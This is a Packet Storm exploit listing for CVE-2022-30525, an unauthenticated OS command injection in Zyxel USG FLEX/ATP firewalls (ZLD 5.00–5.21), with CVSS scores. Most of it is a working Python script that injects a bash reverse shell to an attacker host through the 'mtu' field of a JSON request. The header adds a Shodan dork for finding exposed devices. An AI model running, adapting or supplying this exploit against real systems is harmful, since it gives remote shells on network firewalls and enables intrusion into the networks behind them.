Zyxel USG FLEX 5.21 Command Injection

2022-06-0300:00:00

Valentin Lobstein

packetstormsecurity.com

164

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

JSON

`# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection  
# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"  
# Date: May 18th 2022  
# Exploit Author: Valentin Lobstein  
# Vendor Homepage: https://www.zyxel.com  
# Version: ZLD5.00 thru ZLD5.21  
# Tested on: Linux  
# CVE: CVE-2022-30525  
  
  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
import sys  
import json  
import base64  
import requests  
import argparse  
  
  
parser = argparse.ArgumentParser(  
prog="CVE-2022-30525.py",  
description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",  
)  
parser.add_argument("-u", dest="url", help="Specify target URL")  
parser.add_argument("-r", dest="host", help="Specify Remote host")  
parser.add_argument("-p", dest="port", help="Specify Remote port")  
  
args = parser.parse_args()  
  
banner = (  
"ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"  
"LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"  
"ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"  
"LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"  
"ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"  
"KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"  
"ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"  
"biA6KSApCg=="  
)  
  
  
def main():  
  
print("\n" + base64.b64decode(banner).decode("utf-8"))  
  
if None in vars(args).values():  
print(f"[!] Please enter all parameters !")  
parser.print_help()  
sys.exit()  
  
if "http" not in args.url:  
args.url = "https://" + args.url  
args.url += "/ztp/cgi-bin/handler"  
exploit(args.url, args.host, args.port)  
  
  
def exploit(url, host, port):  
headers = {  
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",  
"Content-Type": "application/json",  
}  
  
data = {  
"command": "setWanPortSt",  
"proto": "dhcp",  
"port": "4",  
"vlan_tagged": "1",  
"vlanid": "5",  
"mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',  
"data": "hi",  
}  
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  
print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")  
  
try:  
response = requests.post(  
url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5  
)  
except (KeyboardInterrupt, requests.exceptions.Timeout):  
print("[!] Bye Bye hekcer !")  
sys.exit(1)  
finally:  
  
try:  
print("[!] Can't exploit the target ! Code :", response.status_code)  
  
except:  
print("[!] Enjoy your shell !!!")  
  
  
if __name__ == "__main__":  
main()  
  
`